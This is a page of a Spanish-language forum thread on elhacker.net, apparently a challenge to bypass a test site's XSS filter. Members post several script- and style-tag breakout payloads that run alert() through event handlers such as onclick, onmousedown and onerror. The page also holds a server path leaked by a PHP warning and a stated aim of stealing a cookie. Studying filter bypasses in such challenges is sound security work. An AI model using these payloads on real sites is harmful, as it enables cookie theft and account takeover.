elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  [CYH] Bypass de filtros de XSS :)		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: [CYH] Bypass de filtros de XSS :)  (Leído 17,527 veces)
SeC

Desconectado Desconectado

Mensajes: 109


@susan.


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #10 en: 15 Abril 2010, 00:08 am »
Parece que aún vale, asique :P

Código:
<STYLE TYPE="text/javascript">><a href="http://elhacker.net" onclick="alert(1)">XSS</a><</STYLE>

otro,

Código:
<script>><a href="http://elhacker.net" onclick="alert(1)">XSS</a><
« Última modificación: 15 Abril 2010, 14:06 pm por SeC » En línea
Educad a los niños y no sera necesario castigar a los hombres - Pitagoras.
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #11 en: 15 Abril 2010, 01:56 am »
Código:
<Script>><p onMouseDown=alert(0) >aa </p> t=
<script language="javascript">><p onMouseDown=alert(0) >aa </p> t=
<Style>><p onMouseOut=alert(0) >aa </p> t=
« Última modificación: 16 Abril 2010, 00:05 am por ~ Yoya ~ » En línea
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.612


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #12 en: 15 Abril 2010, 06:03 am »
jajaja que chafa el filtro
En línea
- https://yhojann.cl/ - https://whk.cl/
jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #13 en: 15 Abril 2010, 06:20 am »
File disclosoure no vale?

Citar
Warning: file_get_contents(/home/simoneme/allowhtml/main/files/antisamy.xml) [function.file-get-contents]: failed to open stream: No such file or directory in /home/simoneme/allowhtml/main/include/controllers/source_antisamy.php on line 7
En línea
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #14 en: 15 Abril 2010, 15:02 pm »
Phat disculosure :P
En línea


Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma
netscape

Desconectado Desconectado

Mensajes: 32


Ver Perfil
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #15 en: 15 Abril 2010, 22:55 pm »
Aquí estan los mios:

Código:
<script>>"/><a><<img src=lol.gif onerror=alert(1)> >

Código:
<script>>"/><a><<img src=lol.gif onerror=window.alert(1)> >

Código:
'>><marquee><h1>XSS</h1></marquee>

Código:
<script><TD><p onmousemove=alert('XSS') >lol </p><TABLE>

Código:
<script>><p lang="es"</p> onmouseup=alert('XSS')>>

Código:
<script>><q lang="he" dir="rtl"><p onmousedown=alert('XSS')</q></p>>

Saludos!!
« Última modificación: 16 Abril 2010, 23:33 pm por netscape » En línea
cgvwzq

Desconectado Desconectado

Mensajes: 57


Agente P.


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #16 en: 15 Abril 2010, 23:11 pm »
Pero si son todos el mismo...xD

Además, el último de netscape no es ni siquiera un bypass. ¬¬

A lo mucho se puede considerar el de SeC, que usa "style" en lugar de "script". Y da igual poner atributos, no afectan.
En línea
Some stuff:

  • www.a] parsed as ]www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #17 en: 16 Abril 2010, 00:16 am »
El último de netscape qué tiene de inyección de javascript?
En línea


Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma
jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #18 en: 16 Abril 2010, 00:31 am »
Castg no necesitas inyectar javascript para que sea xss
En línea
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #19 en: 16 Abril 2010, 02:56 am »
¬¬ pero este desafio es asi :D jajja, sino, xss en si es inyeccion HTML, y yapodemos inyectar html. lol.

la idea, es poder inyectar el codigo javascript para quitar una cookie.
En línea


Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma
Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
bypass
Juegos y Consolas 		gordy(D!@bL0) 2 3,644 Último mensaje 28 Abril 2006, 20:19 pm
por gordy(D!@bL0)
Bypass + iSQL
Nivel Web 		Shell Root 5 4,877 Último mensaje 1 Junio 2011, 21:01 pm
por .mokk.
Bypass getimagesize() Pregunta.
Nivel Web 		dRak0 0 3,952 Último mensaje 27 Noviembre 2013, 02:43 am
por dRak0
Esto es un ByPass?
Dudas Generales 		boy-ka 2 2,802 Último mensaje 30 Julio 2015, 19:50 pm
por boy-ka
Bypass
Hacking 		Izaya 6 7,103 Último mensaje 23 Marzo 2016, 21:28 pm
por MCKSys Argentina
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines